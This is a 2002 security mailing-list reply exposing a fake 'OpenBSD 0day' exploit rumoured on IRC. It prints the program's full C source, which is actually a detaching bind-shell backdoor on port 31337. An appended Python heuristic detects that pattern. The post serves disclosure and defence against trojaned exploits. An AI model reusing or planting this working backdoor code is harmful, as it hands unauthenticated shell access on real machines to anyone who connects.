OSEC

From: Adam Naguszewski (adminbmtmc.gda.pl)
Date: Tue Jun 18 2002 - 04:17:00 CDT

    On Mon, 17 Jun 2002 17:24:03 +0200, Alex de Joode wrote:
    >Any comments ?
    >
    >http://online.securityfocus.com/archive/82/277224/2002-06-14/2002-06-20/0
    >
    ><-- START -->
    >
    >Dear readers,
    >
    >A few days ago, while I was on #darknet, I saw three ScRiPtKidIeZ
    >(among the rest of them) talking about the 7350-crocodile.c,
    >7350-obsdftpd.c and 7350-pf.c exploit code by team
    >teso, made with support of GOBBLES Security, who gave them
    >the advisories.
    >
    >The good news:
    >
    >the exploits ain't that widely spread and they've been kept in the
    >underground for about 1 month. This ain't really good news, but it
    >is better than the ones that follow.
    >
    >The bad news:
    >
    >- openbsd ftp/cvs have been compromised and backdoored by the
    >kiddies, who hang out mostly on #!hack.the.turkey at efnet.
    >- the technique is new and very obscure; the three exploits abuse it
    >and it is applicable only on *BSD flavors (afaik).
    >
    >a really short part of the logs shows this:
    >
    ><m0rgan> ./a.out
    ><m0rgan> 7350-crocodile - x86/OpenBSD apache/telnetd/sshd
    >*** pr0ix (pr0ixdef-con.org) has joined #darknet
    ><m0rgan> by lorian and scut / TESO
    ><m0rgan>
    ><m0rgan> ./7350-crocodile [options] [host] [port] [misc-option]
    ><m0rgan>
    ><m0rgan> -d <daemon> (1= apache, 2= telnetd, 3= sshd)
    ><m0rgan> -b bruteforce
    ><m0rgan> -c check only
    ><m0rgan> -s <0xaddr> start address
    ><m0rgan> -S shellcode (? to show the list)
    ><pr0ix> wtf?
    ><m0rgan>
    ><m0rgan> greetz: synnergy, GOBBLES Security, ElectronicSoulz, shiftee, bnuts, skyper.
    ><m0rgan> sidenote: nasa.gov was really easy ;>
    ><m0rgan> muahah fear.
    ><xxx> could you send me that?
    >*** pr0ix sets mode: +b xxx!*200.*
    >*** xxx was kicked by pr0ix (0day-lurker)
    >
    >keep an eye on your logs; as they said, the exploit makes a
    >lot of noise on the system and in "private" logs and thus it is easy
    >to spot. Put your IDS on.
    >
    ><-- END -->
    >
    There you have it. The famous l33t hyper-turbo 7350-crocodile exploit.
    Have phun. LOL. Btw, it's faked:

    /*
     * Hey! krocodile exploit whatever
     * just have fun :)
     */

    /* This is not an exploit at all: it is a plain bind shell. It listens
     * on TCP port 31337 on every interface and hands anyone who connects
     * an unauthenticated /bin/sh. The "exploit" you ran is the backdoor. */

    #define PORT 31337
    #include <stdio.h>
    #include <stdlib.h>      /* exit() */
    #include <strings.h>     /* bzero() */
    #include <unistd.h>      /* fork(), setpgrp(), dup2(), execl(), close() */
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>

    int soc_des, soc_cli, soc_rc, server_pid, cli_pid;
    socklen_t soc_len;       /* accept() wants socklen_t, not int */
    struct sockaddr_in serv_addr;
    struct sockaddr_in client_addr;

    int main ()
    {
        /* Listening TCP socket bound to INADDR_ANY:PORT. */
        soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (soc_des == -1)
            exit(-1);
        bzero((char *) &serv_addr, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        serv_addr.sin_port = htons(PORT);
        soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
        if (soc_rc != 0)
            exit(-1);
        /* Double fork, new process group, SIGHUP ignored: the listener
         * detaches from the terminal and survives the "exploit" exiting,
         * which is why it looks like the program just returned. */
        if (fork() != 0)
            exit(0);
        setpgrp();
        signal(SIGHUP, SIG_IGN);
        if (fork() != 0)
            exit(0);
        soc_rc = listen(soc_des, 5);
        if (soc_rc != 0)
            exit(0);
        while (1) {
            soc_len = sizeof(client_addr);
            soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
            if (soc_cli < 0)
                exit(0);
            cli_pid = getpid();
            server_pid = fork();
            /* Note the inverted test: the parent serves this client and the
             * child loops back to accept(). It still works, just backwards. */
            if (server_pid != 0) {
                dup2(soc_cli,0);     /* stdin, stdout and stderr -> socket */
                dup2(soc_cli,1);
                dup2(soc_cli,2);
                execl("/bin/sh","sh",(char *)0);
                close(soc_cli);
                exit(0);
            }
        close(soc_cli);
        }
    }

    -- 
    Adam Naguszewski, adminbmtmc.gda.pl on 06-18-2002
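A defender's triage of files like the one above, added here as an example and not part of the original post or any tool it mentions: a small Python heuristic that recognises the bind-shell pattern (bind/listen/accept, three dup2 calls, exec of a shell) and reads out the bound port. SAMPLE_SOURCE is a constructed excerpt of the posted code; the stage names and regexes are my own.

```python
import re

# Constructed excerpt of the posted "exploit" (not read from a file).
SAMPLE_SOURCE = r'''
#define PORT 31337
int main () {
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    soc_rc = listen(soc_des, 5);
    soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
    dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2);
    execl("/bin/sh","sh",(char *)0);
}
'''

# The three stages of a bind shell, each as a regex over C source.
STAGES = {
    "listens on a socket": r"\bbind\s*\(.*?\blisten\s*\(.*?\baccept\s*\(",
    "wires stdio to the socket": r"(\bdup2\s*\([^;]*;\s*){3}",
    "execs a shell": r"\bexec[lv][pe]?\s*\(\s*\"[^\"]*/(sh|bash|ksh|csh)\"",
}

def find_port(src):
    """Return the port passed to htons(), resolving a #define; else None."""
    m = re.search(r"htons\s*\(\s*(\w+)\s*\)", src)
    if not m:
        return None
    tok = m.group(1)
    if tok.isdigit():
        return int(tok)
    d = re.search(r"#define\s+%s\s+(\d+)" % re.escape(tok), src)
    return int(d.group(1)) if d else None

def triage(src):
    """Map each stage to whether it is present, plus 'port' and 'verdict'."""
    src = re.sub(r"/\*.*?\*/|//[^\n]*", "", src, flags=re.S)   # drop comments
    hits = {name: bool(re.search(rx, src, re.S)) for name, rx in STAGES.items()}
    if all(hits.values()):
        verdict = "bind shell (backdoor), not an exploit"
    else:
        verdict = "no bind-shell pattern"
    return {**hits, "port": find_port(src), "verdict": verdict}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_SOURCE).items():
        print(f"{key}: {value}")
```

Run it over any "0day" source before compiling it; a file that claims to attack a remote daemon but never calls connect() and instead listens and execs a shell is the pattern shown above.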